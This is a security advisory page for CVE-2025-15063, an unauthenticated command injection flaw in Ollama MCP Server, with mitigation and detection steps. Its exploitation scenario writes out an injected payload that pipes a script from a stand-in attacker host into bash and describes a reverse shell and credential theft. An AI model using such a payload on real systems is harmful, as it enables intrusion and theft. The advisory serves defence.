CVE-2025-15063

UNKNOWN

Published January 23, 2026

CISO Take

Unauthenticated remote code execution in Ollama MCP Server via OS command injection (CWE-78) — an attacker with network access needs zero credentials to own the host. Any AI agent infrastructure running Ollama with its MCP server exposed is at critical risk right now. Immediately restrict network access to Ollama MCP Server to localhost or trusted subnets, and apply the vendor patch as soon as it is available.

Severity & Risk

CVSS 3.1

N/A

EPSS

N/A

KEV Status

Not in KEV

Sophistication

Trivial

Recommended Action

1) IMMEDIATE: Identify all Ollama MCP Server instances in your environment — check for processes listening on default ports and any Docker/container deployments. 2) Restrict network access: bind Ollama MCP Server to 127.0.0.1 or enforce firewall rules to allow only trusted source IPs. 3) Apply least privilege to the Ollama service account — it should not have access to credentials stores, cloud IAM roles, or sensitive filesystems. 4) Apply vendor patch (ZDI-26-020) immediately upon release; monitor the Ollama GitHub repo and ZDI advisory for patch availability. 5) Detection: monitor for anomalous child processes spawned by the Ollama process (especially shells, curl, wget, base64), and alert on outbound connections from the Ollama service account. 6) If MCP server functionality is not actively required, disable it until patched.

Classification

Code Execution Auth Bypass Agent Plugin Inference AML.T0006 - Active Scanning AML.T0040 - AI Model Inference API Access AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system Article 9(2) - Risk management system for high-risk AI systems

ISO 42001

A.6.1 - AI risk management A.8.4 - Security of AI systems A.9.2 - Operational security for AI systems

NIST AI RMF

MANAGE 2.2 - Mechanisms to sustain value and manage AI risks

OWASP LLM Top 10

LLM03:2025 - Supply Chain LLM06:2025 - Excessive Agency LLM07 - Insecure Plugin Design

Technical Details

NVD Description

Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27683.

Exploitation Scenario

An adversary scans internet-facing IP ranges for exposed Ollama MCP Server endpoints (common in dev/lab environments left accessible). They craft a malicious tool invocation request targeting the vulnerable execAsync method, injecting a payload such as '; curl https://attacker.com/implant.sh | bash' into the user-controlled string parameter. Because no authentication is enforced, the payload executes immediately as the Ollama service account. The attacker establishes a reverse shell, then enumerates environment variables for LLM API keys (OpenAI, Anthropic), cloud credentials, and RAG database connection strings — subsequently exfiltrating model artifacts and pivoting to connected AI infrastructure.

Weaknesses (CWE)

CWE-78 Primary

References

zerodayinitiative.com/advisories/ZDI-26-020/

Timeline

Published

January 23, 2026

Last Modified

January 26, 2026

First Seen

January 23, 2026

Back to Threat Feed